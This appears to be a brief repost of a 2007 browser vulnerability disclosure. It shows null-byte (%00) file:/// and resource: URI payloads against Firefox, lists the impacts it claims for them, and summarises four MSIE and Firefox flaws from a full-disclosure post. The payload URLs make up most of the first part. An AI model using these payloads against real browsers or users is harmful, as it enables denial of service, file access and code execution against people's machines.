Pointers that are vulnerable:
file:///
resource:
Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]
Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
or:
resource:///README.txt%00.html
More filetypes:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.
Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi

This could lead to various exploits, to name a few:
- Dossing a user, the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)
Fuente:
http://www.0x000000.com/index.php?i=333Más:
1) Title : MSIE page update race condition (CRITICAL)
Impact : cookie stealing / setting, page hijacking, memory corruption
Affected : MSIE6 and MSIE7
2) Title : Firefox Cross-site IFRAME hijacking (MAJOR)
Impact : keyboard snooping, content spoofing, etc
Affected : Firefox 2.0
3) Title : Firefox file prompt delay bypass (MEDIUM)
Impact : non-consentual download or execution of files
Affected : Firefox v?.?
3) Title : MSIE6 URL bar spoofing (MEDIUM)
Impact : mimicking an arbitrary site, possibly including SSL data
Affected : MSIE6
Fuente:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063712.html